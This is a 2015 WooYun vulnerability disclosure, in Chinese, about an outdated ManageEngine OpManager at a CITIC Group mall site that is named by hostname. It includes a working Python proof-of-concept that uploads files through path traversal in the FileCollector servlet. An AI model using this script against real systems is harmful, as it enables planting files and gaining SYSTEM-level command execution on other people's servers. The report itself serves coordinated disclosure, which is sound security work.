当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098497

漏洞标题:中信集团旗下某商城运维监控系统存在文件上传可获取系统权限

相关厂商:中信集团

漏洞作者: plane636

提交时间:2015-02-27 11:25

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

opmanager版本过低,附自己用python写的验证程序

详细说明:

存在问题的站点:http://ns1.dchnu.com
使用了低版本的opmanager,存在上传漏洞,该系统是以admin权限跑的,可直接system权限执行命令。
具体的危害和利用方式可参考我以前发的漏洞。
WooYun: 易车网某运维监控系统文件上传任意命令执行&SQL注入
自己写了一个验证程序,可以简单测测,不用搞metaspolit那么麻烦了。

#-*-coding:utf-8-*-
import sys, httplib,webbrowser
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t","--target",dest="host",help="press the target host,not include http://",metavar="HOST")
parser.add_option("-p","--port",dest="port",default='80',help="press the port,default 80")
(options,args) = parser.parse_args()
print options.host,options.port
if options.host==None:
print 'ERROR:please press the correct target'
exit()
host = options.host+':'+options.port
params = "test by w00yun" #上传内容
filename = 'test1.txt' #上传文件名
url = "/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../&FILENAME="+filename
url1 = 'http://'+host+'/'+filename
headers = {
"Content-Type": "application/xml",
"Accept-Encoding": "gzip, deflate",
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Host": host,
"Connection": "Keep-Alive",
"Cache-Control": "no-cache"
}
con2 = httplib.HTTPConnection(host)
con2.request("POST", url, params, headers)
r2 = con2.getresponse()
if r2.status == 500:
print "Success", "\n"
webbrowser.open_new_tab(url1)
else:
print "Failed", "\n"
con2.close()


可以-h看下使用方法

漏洞证明:

QQ截图20150227004354.jpg


QQ截图20150227004430.jpg


QQ截图20150227004439.jpg

修复方案:

更新版本打补丁

版权声明:转载请注明来源 plane636@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-04 08:32

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT转发给中信集团某直属单位,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论